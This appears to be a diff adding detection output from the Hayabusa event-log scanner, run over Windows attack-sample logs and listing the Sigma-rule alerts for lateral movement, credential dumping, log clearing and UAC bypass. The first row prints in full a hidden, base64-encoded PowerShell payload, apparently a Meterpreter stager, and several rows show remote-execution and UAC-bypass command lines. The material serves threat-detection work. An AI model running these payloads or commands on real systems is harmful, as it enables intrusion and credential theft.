+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: powershell.exe  -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:54.152 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:32:51.168 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.246 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd  1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.324 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.371 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami  /all   :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:35:11.856 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\mmc.exe -Embedding  :  Path: C:\Windows\System32\mmc.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,MMC20 Lateral Movement,,rules/sigma/process_creation/win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:12.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd  1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.543 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami  /all   :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 07:48:59.260 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\vssvc.exe  :  Path: C:\Windows\System32\VSSVC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:09.760 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Installer\MSI4FFD.tmp""  :  Path: C:\Windows\Installer\MSI4FFD.tmp  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\msiexec.exe /V",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:10.198 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\Installer\MSI4FFD.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:52:27.588 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: cmd,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx
+2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
+2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,informational,Admin Logon,User: tbt570  :  LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
+2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,informational,Logoff,User: tbt570  :  LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
+2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
+2019-05-09 10:59:28.684 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:28.950 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:29.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""   :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,UAC Bypass via Event Viewer,,rules/sigma/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 11:00:01.794 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe   :  Path: C:\Windows\System32\wsqmcons.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 11:07:51.131 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" /kickoffelev   :  Path: C:\Windows\System32\sdclt.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:08:00.446 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:52:18.844 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp   :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:18.922 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:18.953 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
